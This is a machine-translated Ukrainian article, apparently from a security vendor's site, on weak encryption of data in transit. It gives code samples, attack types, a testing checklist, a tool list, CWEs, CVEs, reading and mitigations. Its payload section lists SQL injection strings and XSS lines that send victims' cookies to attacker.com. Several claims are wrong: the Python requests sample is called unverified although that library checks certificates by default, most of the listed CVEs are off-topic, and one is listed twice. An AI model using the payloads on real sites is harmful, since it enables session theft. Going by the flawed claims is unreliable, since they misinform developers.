16 Лют, 2023

Недостатня криптографічна захист переданих даних

Vulnerability Assessment as a Service (VAaaS)

Tests systems and applications for vulnerabilities to address weaknesses.

Недостатня криптографічна захист даних в дорозі відноситься до уразливості в системі безпеки, при якій дані, що передаються по мережі або між системами, недостатньо захищені кодуванням. Це може дозволити неавторизованим третім особам перехоплювати, отримувати доступ до даних і потенційно використовувати їх, що призводить до цілої низки ризиків для безпеки, таких як крадіжка даних, маніпулювання даними й несанкціонований доступ до конфіденційної інформації. Організаціям важливо використовувати надійні криптографічні протоколи та алгоритми для забезпечення належного шифрування даних під час передачі, щоб запобігти цей тип вразливості.

Приклад уразливого коду на різних мовах програмування:


В Java:

				
					import javax.net.ssl.*;
import java.io.*;
import java.net.*;

public class MyClient {

    public static void main(String[] args) throws IOException {
        String urlStr = "https://example.com";
        URL url = new URL(urlStr);
        HttpsURLConnection conn = (HttpsURLConnection) url.openConnection();
        BufferedReader in = new BufferedReader(new InputStreamReader(conn.getInputStream()));
        String inputLine;
        while ((inputLine = in.readLine()) != null) {
            System.out.println(inputLine);
        }
        in.close();
    }
}

				
			


У цьому прикладі Java HTTPS-з'єднання встановлюється за допомогою HttpsURLConnection клас, але немає явної конфігурації протоколу SSL / TLS, що означає, що протокол за замовчуванням може бути недостатньо надійним, щоб забезпечити достатню криптографічний захист передаваних даних. Щоб усунути цю уразливість, рекомендується явно налаштувати протокол SSL / TLS і використовувати надійні криптографічні алгоритми.

• в Python:

				
					import requests

url = "https://example.com"
response = requests.get(url)
print(response.content)

				
			


У цьому прикладі Python requests бібліотека використовується для відправки HTTP GET-запиту на віддалений сервер по протоколу HTTPS. Проте явна перевірка SSL / TLS-сертифіката сервера відсутнє, що означає, що з'єднання потенційно може бути піддано атаки "людина посередині". Щоб усунути цю уразливість, рекомендується перевірити сертифікат SSL / TLS сервера перед відправкою яких-небудь даних.

• в C#:

				
					using System.Net;

public class MyClient {

    static void Main(string[] args) {
        string url = "https://example.com";
        WebClient client = new WebClient();
        string result = client.DownloadString(url);
        Console.WriteLine(result);
    }
}

				
			


У цьому прикладі C # WebClient class використовується для завантаження вмісту веб-сторінки по протоколу HTTPS, але немає явної конфігурації протоколу SSL / TLS, що означає, що протокол за замовчуванням може бути недостатньо надійним, щоб забезпечити достатню криптографічний захист передаваних даних. Щоб усунути цю уразливість, рекомендується явно налаштувати протокол SSL / TLS і використовувати надійні криптографічні алгоритми.

Приклади експлуатації Недостатня криптографічна захист даних при передачі

Атака "Людина посередині" (MitM):
Зловмисник перехоплює обмін даними між клієнтом і сервером може переглядати, змінювати або вводити дані в обмін даними. Якщо повідомлення не буде зашифроване належним чином, зловмисник може легко прочитати дані і маніпулювати ними.

Підслуховування:
Зловмисник пасивно перехоплює і прослуховує обмін даними між клієнтом і сервером. Якщо повідомлення не буде зашифроване належним чином, зловмисник може легко прочитати дані.

Підробка даних:
Зловмисник перехоплює обмін даними між клієнтом і сервером і змінює передані дані. Це може бути використано для впровадження шкідливого контенту, зміни змісту повідомлення або навіть для того, щоб видати себе за відправника або одержувача.

Повторна атака:
Зловмисник перехоплює і записує обмін даними між клієнтом і сервером, а потім відтворює цей обмін даними для виконання шкідливого дії. Це може бути використано для повторної відправки конфіденційних даних або конфіденційних дій пізніше або для отримання несанкціонованого доступу до системи.

Эксфильтрация даних:
Зловмисник перехоплює і витягує конфіденційні дані з обміну даними між клієнтом і сервером. Якщо дані не зашифровані належним чином, зловмисник може легко прочитати і отримати конфіденційні дані, які потім можуть бути використані для зловмисних цілей, таких як крадіжка особистих даних, фінансове шахрайство або корпоративний шпигунство.

Методи підвищення привілеїв при недостатній криптографічного захисту переданих даних

Крадіжка облікових даних:
Якщо зв'язок між клієнтом і сервером не зашифрована належним чином, зловмисник може перехопити і вкрасти особисту інформацію, таку як імена користувачів і паролі, які потім можуть бути використані для підвищення привілеїв і отримання доступу до інших систем або ресурсів.

Атака "Людина посередині":
Як згадувалося раніше, недостатня криптографічна захист переданих даних може призвести до атаки "людина посередині" (MitM), при якій зловмисник перехоплює повідомлення та маніпулює ним. У контексті підвищення привілеїв MitM-атака може бути використана для крадіжки або зміни даних, які дозволяють зловмиснику отримати більш високорівнева доступ до системи або мережі.

Перехоплення сеансу:
Недостатня криптографічний захист передаваних даних також може полегшити зловмиснику захоплення сеансу користувача та доступ до його облікового запису, яка потім може бути використана для виконання дій з підвищеними привілеями. Наприклад, зловмисник може перехопити файл cookie сеансу або маркер, який відправляється у вигляді відкритого тексту, і використовувати його для уособлення користувача та доступу до конфіденційних ресурсів.

Використання вразливостей:
Недостатня криптографічний захист передаваних даних також може бути використана для використання інших вразливостей в системі або мережі, які потім можуть бути використані для підвищення привілеїв. Наприклад, якщо зловмисник здатний перехоплювати незашифрований мережевий трафік, він може виявити уразливості в програмному забезпеченні, що використовується клієнтом або сервером, які потім можуть бути використані для отримання більш високих привілеїв.

Загальна методологія та контрольний список за недостатню криптографічний захист передаваних даних

Методологія:

  1. Визначте об'єм оцінки: Визначте обсяг оцінки, який може включати конкретні сегменти мережі, системи або програми, які передають конфіденційні дані.

  2. Визначте відповідні протоколи та методи шифрування: Визначте протоколи та методи шифрування, що використовуються досліджуваними системами і додатками, і оцініть їх надійність і ефективність захисту даних під час передачі.

  3. Оцінка використання сертифікатів і ланцюжків довіри: Оцінка використання цифрових сертифікатів і ланцюжків довіри для перевірки особи обмінюються даними сторін і забезпечення цілісності передаваних даних.

  4. Оцінка використання безпечних транспортних протоколів: Визначте, чи зв'язок між клієнтом і сервером з використанням безпечних транспортних протоколів, таких як SSL / TLS, і оцініть їх конфігурацію і реалізацію.

  5. Оцінка використання алгоритмів шифрування: Оцініть використання алгоритмів шифрування для захисту переданих даних і переконайтеся, що вони надійні і не вразливі для атак.

  6. Оцінка використання ключових управлінських: Оцініть методи керування ключами, включаючи генерацію, зберігання та розповсюдження ключів, і переконайтеся, що вони безпечні і не ставлять під загрозу конфіденційність, цілісність або доступність даних.

  7. Оцінка використання захищених шифрів: Оцініть використання безпечних шифрів для шифрування переданих даних і переконайтеся, що вони не вразливі для атак, таких як повторні атаки або ін'єкційні атаки.

  8. Оцінка впровадження управління сеансами: Оцініть реалізацію управління сеансами, включаючи використання захищених токенів сеансу і файлів cookie, і переконайтеся, що вони не вразливі для атак, таких як перехоплення сеансу.

  9. Оцініть методи ведення журналу та моніторингу: Оцініть існуючі методи ведення журналу та моніторингу для виявлення потенційних атак і реагування на них, а також переконайтеся, що вони ефективні та своєчасні.

  10. Документуйте і повідомляйте про результати: Документуйте результати оцінки, включаючи будь-які виявлені вразливості або слабкі місця, і повідомляйте про них відповідним зацікавленим сторонам.

Контрольний список:

  1. Переконайтеся, що конфіденційні дані ідентифіковані правильно: Переконайтеся, що конфіденційні дані правильно ідентифіковані та що передаються тільки необхідні дані.

  2. Перевірте використання безпечних протоколів: Переконайтеся, що для шифрування переданих даних використовуються захищені протоколи, такі як SSL/ TLS.

  3. Перевірка реалізації захищених шифрів: Переконайтеся, що для шифрування переданих даних використовуються безпечні шифри, такі як AES.

  4. Перевірте реалізацію безпечного обміну ключами: Переконайтеся, що для безпечного обміну ключами шифрування використовуються безпечні протоколи обміну ключами, такі як Діффі-Хеллман.

  5. Перевірте використання надійних алгоритмів шифрування: Переконайтеся, що для захисту переданих даних використовуються надійні алгоритми шифрування, такі як RSA або ECC.

  6. Перевірте виконання перевірки сертифіката: Переконайтеся, що сертифікати належним чином перевірені, щоб запобігти атаки "людина посередині".

  7. Перевірте реалізацію закріплення сертифіката: Переконайтеся, що використовується закріплення сертифіката, щоб гарантувати, що сертифікат, наданий сервером, є довіреною.

  8. Перевірте реалізацію безпечного керування файлами cookie: Переконайтеся, що токени сеансу і файли cookie управляються надійно, щоб запобігти атакам з перехопленням сеансу.

  9. Перевірте правильність реалізації обробки помилок: Переконайтеся, що існує належна обробка помилок, щоб запобігти витоку інформації та інші уразливості.

  10. Перевірте методи ведення журналу та моніторингу: Переконайтеся, що існують належні методи ведення журналу та моніторингу для виявлення потенційних атак і реагування на них.

Набір інструментів для експлуатації Недостатня криптографічна захист переданих даних

Автоматизовані інструменти:

  • Burp Suite – популярний інструмент тестування веб-додатків, що включає функції для перехоплення, аналізу і зміни мережевого трафіку, включаючи протоколи шифрування і безпеки.

  • OWASP ZAP – інструмент тестування безпеки веб-додатків з відкритим вихідним кодом, який включає в себе набір функцій для тестування протоколів шифрування та безпеки, включаючи SSL / TLS, сертифікати і шифри.

  • Nikto – сканер веб-сервера, який включає функції для виявлення вразливостей в протоколах шифрування та безпеки, включаючи заголовки SSL / TLS і HTTP.

  • sslscan – інструмент командного рядка для тестування реалізацій SSL / TLS на наявність вразливостей, включаючи слабкі шифри і протоколи.

  • testssl.sh – інструмент командного рядка для тестування конфігурацій SSL / TLS на наявність вразливостей, включаючи слабкі шифри, сертифікати та протоколи.

  • sslyze – інструмент командного рядка для тестування реалізацій SSL / TLS на наявність вразливостей, включаючи слабкі шифри і протоколи.

  • SSLyze-SSL Scanner – інструмент командного рядка для тестування конфігурацій SSL / TLS на наявність вразливостей, включаючи слабкі шифри і протоколи.

  • Nmap – популярний мережевий сканер, який включає в себе функції для виявлення відкритих портів, уразливих протоколів і наборів шифрів.

Ручні Інструменти:

  • Wireshark – аналізатор мережевих протоколів, який дозволяє перевіряти і змінювати мережевий трафік, включаючи протоколи шифрування і безпеки.

  • openssl – інструмент командного рядка для тестування та перевірки сертифікатів SSL / TLS, наборів шифрів та інших параметрів безпеки.

  • Ssleuth – інструмент командного рядка для аналізу з'єднань SSL / TLS, включаючи ланцюжка сертифікатів та набори шифрів.

  • Fiddler – проксі-сервер веб-налагодження, який дозволяє перевіряти і змінювати мережевий трафік, включаючи протоколи шифрування і безпеки.

  • Ethereal – аналізатор мережевих протоколів, який дозволяє перевіряти і змінювати мережевий трафік, включаючи протоколи шифрування і безпеки.

  • Netcat – інструмент командного рядка для тестування мережевих підключень, включаючи з'єднання SSL / TLS.

  • OpenSSL s_client – інструмент командного рядка для тестування з'єднань SSL / TLS, включаючи перевірку сертифікатів та узгодження набору шифрів.

  • GnuTLS-cli – інструмент командного рядка для тестування з'єднань SSL / TLS, включаючи перевірку сертифікатів та узгодження набору шифрів.

  • SSL Digger – інструмент тестування веб-додатків, який дозволяє перевіряти з'єднання SSL / TLS, включаючи ланцюжка сертифікатів та набори шифрів.

Плагіни для браузера:

  • HTTPS Everywhere – розширення браузера, яке примусово підключає HTTPS-з'єднання для сайтів, які його підтримують.

  • SSL/TLS Status – розширення для браузера, яке відображає стан шифрування та безпеки SSL / TLS сполук веб-сайту.

  • CipherFox – розширення для браузера, яке відображає стан шифрування та безпеки SSL / TLS сполук веб-сайту і дозволяє перевіряти набори шифрів.

Середній бал CVSS стек Недостатня криптографічний захист передаваних даних

Загальна система оцінки вразливостей (CVSS) - це платформа для оцінки серйозності вразливостей програмного забезпечення з оцінками в діапазоні від 0 до 10. Оцінка заснована на різних факторах, таких як вплив уразливості і простота експлуатації.

Середній бал CVSS для вразливостей, пов'язаних з недостатньою криптографічного захисту переданих даних, може сильно варіюватися в залежності від конкретної уразливості та оцінюваного програмного забезпечення або системи. Однак, в цілому, проблеми, пов'язані з недостатньою криптографічного захисту переданих даних, як правило, оцінюються як висока або критична ступінь серйозності, з оцінками CVSS 7,0 або вище.

Загальна перерахування слабких місць (CWE)

CWE-311: відсутній шифрування конфіденційних даних – цей недолік відноситься до випадків, коли конфіденційна інформація не захищена належним чином за допомогою шифрування під час передачі або зберігання, що робить її вразливою для перехоплення або несанкціонованого доступу.

CWE-319: передача конфіденційної інформації у відкритому вигляді – цей недолік відноситься до випадків, коли конфіденційна інформація, така як паролі або номери кредитних карт, передається по мережі у вигляді відкритого тексту без якої-небудь форми шифрування, що полегшує зловмиснику перехоплення та зчитування даних.

CWE-523: незахищена передача облікових даних – ця уразливість відноситься до випадків, коли конфіденційні дані для аутентифікації, такі як імена користувачів і паролі, що передаються по мережі у вигляді відкритого тексту або з використанням слабкого шифрування, що робить їх уразливими для перехоплення та несанкціонованого доступу.

CWE-614: конфіденційний файл cookie сеансу HTTPS без атрибуту "Secure" – ця уразливість відноситься до випадків, коли захищений файл cookie, який призначений для передачі тільки по зашифрованому HTTPS-з'єднанню, передається по незашифрованному HTTP-з'єднання, що робить його вразливим для перехоплення і атак з перехопленням сеансу.

CWE-200: Розкриття інформації – ця уразливість відноситься до випадків, коли конфіденційна інформація, така як паролі або особиста інформація, стає доступною неавторизованим особам з-за неправильного використання або зберігання або із-за вразливостей в програмному забезпеченні або системі.

CWE-329: не випадкові IV в режимі CBC – ця слабкість відноситься до випадків, коли режим ланцюжка блоків шифрування (CBC) використовується для шифрування без використання випадкового вектора ініціалізації (IV), що може зробити шифрування вразливим для певних атак.

CWE-330: використання недостатньо випадкових значень – цей недолік відноситься до випадків, коли випадкові значення, такі як ключі шифрування або вектори ініціалізації, генеруються з використанням передбачуваних або недостатньо випадкових джерел, що полегшує їх вгадування або прогнозування.

CWE-345: недостатня перевірка достовірності даних – цей недолік відноситься до випадків, коли дані не перевіряються належним чином для забезпечення їх достовірності, наприклад, з допомогою цифрових підписів, що робить їх уразливими для підробки або модифікації.

CWE-347: Неправильна перевірка криптографічного підпису – ця слабкість відноситься до випадків, коли криптографічні підпису не перевіряються належним чином, наприклад, через використання слабких алгоритмів або неправильного використання функції перевірки підпису.

CWE-759: використання однобічної хеш-без солі - ця слабкість відноситься до випадків, коли односторонні хеш–функції, такі як SHA-1 і MD5, використовуються для зберігання паролів або інших конфіденційних даних без використання значення солі, що може зробити хеш більш вразливим для попередньо обчислені атаки по словнику.

CWE-799: Неправильний контроль частоти взаємодії – ця слабкість відноситься до випадків, коли додаток належним чином не обмежує частоту користувальницьких взаємодій, таких як спроби входу в систему, що може зробити систему більш вразливою для атак методом перебору.

Топ-10 CVE, пов'язаних з недостатньою криптографічного захисту переданих даних

CVE-2021-33885 – Вразливість недостатньої перевірки достовірності даних в B. Braun SpaceCom2 до 012U000062 дозволяє віддаленому зловмиснику, який не пройшов перевірку автентичності, відправляти на пристрій шкідливі дані, які будуть використовуватися замість правильних даних. Це призводить до повного доступу до системним командам та їх виконання через відсутність криптографічних підписів на критично важливих наборах даних.

CVE-2020-8489 – Недостатній захист функцій межпроцессного взаємодії в ABB System 800xA Information Management (всі опубліковані версії) дозволяє зловмисникові, який пройшов перевірку автентичності в локальній системі, вводити дані, впливаючи на значення часу виконання, які будуть зберігатися в архіві, або роблячи служби історії управління інформацією недоступними.

CVE-2020-8488 – Недостатній захист функцій межпроцессного взаємодії в системі ABB 800xA Batch Management (всі опубліковані версії) дозволяє зловмисникові, який пройшов перевірку автентичності в локальній системі, вводити дані, впливаючи на оновлення користувальницького інтерфейсу під час пакетного виконання та / або функції порівняння / друку.

CVE-2020-8487 – Недостатній захист функцій межпроцессного взаємодії в ABB System 800xA Base (всі опубліковані версії) дозволяє зловмисникові, який пройшов перевірку автентичності в локальній системі, вводити дані, впливати на обробку надмірності сайту.

CVE-2020-8486 – Недостатній захист функцій межпроцессной зв'язку в системі ABB 800xA RNRP (всі опубліковані версії) дозволяє зловмисникові, який пройшов перевірку автентичності в локальній системі, вводити дані, впливати на обробку надмірності сайту.

CVE-2020-8485 – Недостатній захист функцій межпроцессного взаємодії в ABB System 800xA для MOD 300 (всі опубліковані версії) дозволяє зловмисникові, який пройшов перевірку автентичності в локальній системі, вводити дані, дозволяючи виконувати операції читання і запису в контролери або викликати збій процесів Windows.

CVE-2020-8485 – Недостатній захист функцій межпроцессного взаємодії в ABB System 800xA для DCI (всі опубліковані версії) дозволяє зловмисникові, який пройшов перевірку автентичності в локальній системі, вводити дані, дозволяючи виконувати операції читання і запису в контролери або викликати збій процесів Windows.

CVE-2020-8478 – Недостатній захист функцій межпроцессного взаємодії в продуктах ABB System 800xA OPC Server для AC 800M, MMS Server для AC 800M і базове програмне забезпечення для SoftControl (всі опубліковані версії) дозволяє зловмисникові, який пройшов перевірку автентичності в локальній системі, вводити дані, впливаючи на онлайн-перегляд даних часу виконання, що відображаються в Control Builder.

CVE-2020-3549 – Уразливість в функціональності sftunnel програмного забезпечення Cisco Firepower Management Center (FMC) і програмного забезпечення Cisco Firepower Defense Threat (FTD) може дозволити віддаленого зловмиснику, який не пройшов перевірку, отримати хеш реєстрації пристрою. Уразливість пов'язана з недостатнім захистом від узгодження sftunnel під час первинної реєстрації пристрою. Зловмисник, що займає позицію "людина посередині", може скористатися цією уразливістю, перехопивши певний потік зв'язку sftunnel між пристроєм FMC і пристроєм FTD. Успішний експлойт може дозволити зловмиснику розшифрувати і змінити зв'язок sftunnel між пристроями FMC і FTD, дозволяючи зловмиснику змінювати дані конфігурації, що відправляються з пристрою FMC на пристрій FTD, або дані сповіщення, що відправляються з пристрою FTD на пристрій FMC.

CVE-2020-3520 – Уразливість в програмному забезпеченні Cisco Data Center Network Manager (DCNM) може дозволити локального зловмиснику, який пройшов перевірку автентичності, отримати конфіденційну інформацію з уразливого пристрою. Уразливість пов'язана з недостатнім захистом конфіденційної інформації на вразливому пристрої. Зловмисник з будь-яким рівнем привілеїв може скористатися цією уразливістю, отримавши доступ до локальних файлових систем і витягуючи з них конфіденційну інформацію. Успішний експлойт може дозволити зловмиснику переглянути конфіденційні дані, які він може використовувати для підвищення своїх привілеїв.

Недостатня криптографічна захист переданих даних подвиги

Heartbleed: Це уразливість в криптографічної бібліотеки OpenSSL, яка дозволяє зловмисникові зчитувати конфіденційну інформацію, включаючи паролі і закриті ключі, з пам'яті вразливою системи.

POODLE: Це уразливість в SSL, версії 3.0, яка дозволяє зловмисникові перехоплювати і розшифровувати захищені сполучення між клієнтом і сервером, включаючи конфіденційну інформацію, таку як паролі, номери кредитних карт.

BEAST: Це уразливість в протоколах SSL / TLS, яка дозволяє зловмисникові перехоплювати і розшифровувати захищені повідомлення, включаючи конфіденційну інформацію, таку як облікові дані для входу та фінансові транзакції.

CRIME: Це уразливість в протоколах SSL / TLS, яка дозволяє зловмисникові розшифровувати файли cookie, які використовуються для управління сеансами, що дозволяє їм перехоплювати сеанс користувача отримувати доступ до конфіденційної інформації.

BREACH: Це уразливість, що дозволяє зловмисникові отримувати конфіденційну інформацію з зашифрованого потоку веб-трафіку, використовуючи певні алгоритми стиснення.

DROWN: Це уразливість, що дозволяє зловмисникові розшифровувати повідомлення SSL / TLS, використовуючи недолік в протоколі SSLv2.

FREAK: Це уразливість в SSL / TLS, яка дозволяє зловмисникові перехоплювати і розшифровувати захищені повідомлення, примушуючи використовувати алгоритм шифрування більш низького рівня.

Logjam: Це уразливість, що дозволяє зловмисникові послабити шифрування, що використовується в комунікаціях SSL / TLS, використовуючи слабкі місця в алгоритмі обміну ключами Діффі-Хеллмана.

Sweet32: Це уразливість, що дозволяє зловмисникові розшифровувати трафіку SSL / TLS, використовуючи слабкість в алгоритмі шифрування 3DES.

Практикуючись в тестуванні на Недостатня криптографічна захист переданих даних

Використовуйте вразливі віртуальні машини:
Існують різні вразливі віртуальні машини, такі як Metasploitable, які призначені для забезпечення безпечної та правового середовища для практичного тестування та використання вразливостей в системі безпеки, в тому числі пов'язаних з недостатньою криптографічного захисту переданих даних.

Використовуйте фреймворки тестування:
Існують різні доступні платформи тестування, такі як OWASP ZAP і Burp Suite, які можна використовувати для перевірки недостатньою криптографічного захисту переданих даних. Ці платформи надають ряд інструментів і функцій, що допомагають виявляти і використовувати уразливості в веб-додатках.

Беріть участь в CTFs:
Змагання Capture the Flag (CTF) дають можливість попрактикуватися у тестуванні та експлуатації моделюється середовищі. Багато CTF включають проблеми, пов'язані з недостатньою криптографічного захисту переданих даних, такі як дешифрування повідомлень або злом слабких алгоритмів шифрування.

Читайте про реальних прикладах:
Вивчення реальних прикладів недостатньою криптографічного захисту вразливостей і експлойтів при передачі даних може допомогти вам зрозуміти, як вони працюють і як їх ідентифікувати. В Інтернеті доступні різні ресурси, такі як блоги з безпеки і новинні сайти, які надають інформацію про останні загрози безпеці та вразливості.

Практикуйтеся в своїх власних проектах:
Якщо у вас є власний веб-додаток або мережу, ви можете практикувати тестування на недостатню криптографічний захист передаваних даних, намагаючись виявити і використовувати уразливості вашої системи. Це може допомогти вам краще зрозуміти конкретні ризики і проблеми, до яких може бути вразлива ваша система.

Для вивчення Недостатньою криптографічного захисту переданих даних

Ознайомтеся з основами криптографії: Розуміння основ криптографії, таких як алгоритми шифрування, протоколи обміну ключами і цифрові підписи, має важливе значення для розуміння недостатньою криптографічного захисту переданих даних. Існують різні доступні онлайн-ресурси, такі як навчальні посібники, технічні документи і книги, які охоплюють основи криптографії.

Дізнайтеся про поширених атаках і вразливості: Розуміння поширених атак, пов'язаних з недостатньою криптографічного захисту переданих даних, таких як атаки типу "людина посередині", уразливості SSL / TLS і слабкі алгоритми шифрування, має важливе значення для виявлення і зниження цих ризиків. Список OWASP Top 10 є гарною відправною точкою для вивчення поширених ризиків безпеки веб-додатків.

Практичне тестування і використання вразливостей: Як згадувалося раніше, існують різні способи практичного тестування та використання вразливостей, пов'язаних з недостатньою криптографічного захисту переданих даних, такі як використання вразливих віртуальних машин, тестування фреймворків та участь у CTFS.

Відвідувати програми навчання та сертифікації: Існують різні програми навчання та сертифікації, які зосереджені на безпеки веб-додатків, включаючи теми, пов'язані з недостатньою криптографічного захисту переданих даних. Прикладами можуть служити програми Certified Ethical Hacker (CEH) і Offensive Security Certified Professional (OSCP).

Будьте в курсі останніх новин і досліджень: Отримання інформації про останні загрози безпеки, уразливість і дослідженнях, пов'язаних з недостатньою криптографічного захисту переданих даних, має важливе значення для розуміння мінливого ландшафту безпеки веб-додатків. Існують різні доступні ресурси, такі як блоги щодо безпеки, новинні сайти і дослідні роботи, які висвітлюють останні розробки в цій області.

Книги з оглядом Недостатньою криптографічного захисту переданих даних

"Криптографічний інженерія: принципи проектування та практичне застосування" автори: Брюс Шнайер, Нільс Фергюсон і Тадаєсі Коно. У цій книзі представлено всебічний огляд проектування і впровадження криптографічних систем, включаючи докладне обговорення різних атак, пов'язаних з недостатньою криптографічного захисту переданих даних.

"SSL і TLS: теорія і практика" автор: Рольф Опплигер. У цій книзі докладно розглядається SSL / TLS, включаючи його історію, структуру протоколу, криптографічні алгоритми та уразливості в системі безпеки. Він також містить практичне керівництво з впровадження та налаштування SSL / TLS у веб-додатках.

"Безпека веб-додатків, керівництво для початківців" автори: Брайан Салліван і Вінсент Ллю. Ця книга містить безпека веб-додатків, включаючи теми, пов'язані з недостатньою криптографічного захисту переданих даних. Він включає в себе практичне керівництво по виявленню і пом'якшення різних ризиків безпеки і уразливостей у веб-додатках.

"Заплутана мережа: керівництво по забезпеченню безпеки сучасних веб-додатків" автор: Міхал Залевський. У цій книзі докладно розглядається безпека веб-додатків, включаючи поширені атаки і проблеми, пов'язані з недостатньою криптографічного захисту переданих даних. Він також містить практичні рекомендації щодо захисту веб-додатків від цих ризиків.

"Криптографія в реальному світі" автор: Девід Вонг. Ця книга являє собою практичне керівництво по криптографії, включаючи різні атаки і проблеми, пов'язані з недостатньою криптографічного захисту переданих даних. Він також включає практичне керівництво з впровадження і розгортання криптографічних систем у реальних середовищах.

"Безпека веб-додатків: повне керівництво по забезпеченню безпеки вашого веб-додатки" автор: Ендрю Хоффман. У цій книзі представлений огляд безпеки веб-додатків, включаючи різні атаки і проблеми, пов'язані з недостатньою криптографічного захисту переданих даних. Він включає в себе практичне керівництво по захисту веб-додатків від цих ризиків і містить огляд різних інструментів і технологій безпеки.

"Куленепробивний SSL і TLS: розуміння і розгортання SSL / TLS і PKI для захисту серверів і веб-додатків" автор: Іван Рістіч. У цій книзі докладно розглядаються SSL / TLS і PKI, включаючи різні атаки і проблеми, пов'язані з недостатньою криптографічного захисту переданих даних. Він також містить практичне керівництво по розгортанню SSL / TLS і PKI в реальних середовищах.

"Злом веб-додатків: Серія "Мистецтво злому" автори: Дэффидд Штуттард і Маркус Пінто. Ця книга являє собою практичне керівництво з безпеки веб-додатків, включаючи різні атаки і проблеми, пов'язані з недостатньою криптографічного захисту переданих даних. Він включає в себе практичне керівництво по виявленню та використанню цих ризиків, а також містить огляд різних інструментів та технологій забезпечення безпеки.

"Інженерія безпеки: керівництво по створенню надійних розподілених систем" автор: Росс Андерсон. У цій книзі представлено всебічний огляд розробки систем безпеки, включаючи різні атаки і проблеми, пов'язані з недостатньою криптографічного захисту переданих даних. Він також включає в себе практичне керівництво з проектування і впровадження захищених систем.

"Керівництво по тестуванню OWASP v4" Проектом Open Web Application Security Project. У цьому посібнику представлено огляд тестування безпеки веб-додатків, включаючи різні атаки і проблеми, пов'язані з недостатньою криптографічного захисту переданих даних. Він включає в себе практичне керівництво по виявленню та використанню цих ризиків, а також містить огляд різних інструментів та технологій забезпечення безпеки.

Список корисних навантажень Недостатня криптографічний захист передаваних даних

  1. Корисні навантаження SQL-ін'єкцій: Атаки з використанням SQL-ін'єкцій можуть використовуватися для отримання конфіденційної інформації з веб-додатки, таких як імена користувачів і паролі, які можуть передаватися відкритим текстом. Деякі приклади корисних навантажень включають:

    ' or '1'='1
    (базова спроба ін'єкції)

    ' UNION SELECT password FROM users (спроба витягнути паролі з таблиці користувачів)

  2. Корисне навантаження XSS: Атаки з використанням міжсайтового скриптинга (XSS) можуть використовуватися для крадіжки сеансових файлів cookie або інших конфіденційних даних, що передаються відкритим текстом. Деякі приклади корисних навантажень включають:

    <script>document.location="http://attacker.com/cookie_grabber.php?cookie=" + document.cookie;</script>

    <img src="https://attacker.com/evil_image.png" onerror="document.location='http://attacker.com/xss.php?cookie='+document.cookie;">

  3. Корисне навантаження Man-in-the-middle: Ці корисні навантаження можуть використовуватися для перехоплення мережевого трафіку і управління ним при передачі, що потенційно дозволяє зловмисникові вкрасти конфіденційні дані, що передаються відкритим текстом. Деякі приклади корисних навантажень включають:

    Підміна ARP для перенаправлення трафіку на шахрайську точку доступу, контрольовану зловмисником.

    Атаки з видаленням SSL для зниження рівня захищених HTTPS-з'єднань до незашифрованого HTTP.

Як захиститися від недостатньої криптографічного захисту переданих даних

  1. Використовуйте шифрування: Завжди використовуйте шифрування для захисту конфіденційних даних при передачі. Використовуйте безпечні протоколи, такі як HTTPS, SSL або TLS, і переконайтеся, що ваші сертифікати оновлені і правильно налаштовані.

  2. Використовуйте надійні паролі: Переконайтеся, що ваші паролі надійні, унікальні і регулярно змінюються. Використовуйте двофакторну аутентифікацію, коли це можливо, щоб додати додатковий рівень безпеки.

  3. Використовуйте VPN: Якщо ви працюєте віддалено, використовуйте віртуальну приватну мережу (VPN) для шифрування всіх ваших переданих даних.

  4. Підтримуйте програмне забезпечення в актуальному стані: Переконайтеся, що все ваше програмне забезпечення оновлено з використанням останніх виправлень і виправлень безпеки. Сюди входять операційні системи, веб-сервери та програмне забезпечення, яке ви використовуєте.

  5. Використовуйте брандмауери: Використовуйте брандмауер для захисту своєї мережі та блокування вхідного трафіку з ненадійних джерел.

  6. Обмежити експозицію: Обмежте обсяг конфіденційних даних, що передаються відкритим текстом. Наприклад, уникайте передачі паролів або іншої конфіденційної інформації за незашифрованим каналах.

  7. Використовуйте заголовки безпеки: Використовуйте заголовки безпеки, такі як HTTP Strict Transport Security (HSTS) і Content Security Policy (CSP), для захисту від таких атак, як видалення SSL і міжсайтовий скриптінг.

Заходи по пом'якшенню наслідків недостатньої криптографічного захисту переданих даних

  1. Використовуйте безпечні протоколи шифрування: Використовуйте безпечні протоколи шифрування, такі як SSL / TLS, щоб гарантувати, що конфіденційні дані передаються по мережі у зашифрованому вигляді.

  2. Використовуйте надійні і унікальні ключі шифрування: Використовуйте надійні і унікальні ключі шифрування, щоб перешкодити зловмисникам розшифрувати дані, що передаються по мережі.

  3. Використовуйте взаємну аутентифікацію: Використовуйте взаємну аутентифікацію, щоб переконатися, що і клієнт, і сервер пройшли перевірку автентичності перед передачею даних по мережі. Це допомагає запобігти атаки типу "людина посередині".

  4. Використовуйте закріплення сертифіката: Використовуйте закріплення сертифіката, щоб гарантувати, що клієнт приймає тільки певний сертифікат при підключенні до сервера. Це допомагає запобігти атаки типу "людина посередині".

  5. Використовуйте безпечні методи кодування: Використовуйте методи безпечного кодування, щоб допомогти запобігти уразливості, які можуть бути використані зловмисниками для отримання доступу до конфіденційних даних.

  6. Використовуйте сегментацію мережі: Використовуйте сегментацію мережі, щоб обмежити обсяг конфіденційних даних, переданих по мережі. Це може допомогти запобігти доступу зловмисників до конфіденційних даних, навіть якщо вони зможуть отримати доступ до мережі.

  7. Використовуйте тестування безпеки: Використовуйте тестування безпеки для виявлення вразливостей в системі і запобігання використання зловмисниками цих вразливостей для отримання доступу до конфіденційних даних.

Висновок

Недостатня криптографічна захист даних передача даних може призвести до крадіжки даних, несанкціонованого доступу та інших порушень безпеки. Використання шифрування має важливе значення для захисту конфіденційних даних при передачі, і існує кілька методів шифрування, доступних на вибір. Важливо вибрати відповідний метод шифрування, виходячи з конкретних потреб програми або системи.

Інші Послуги

Готові до безпеки?

зв'язатися з нами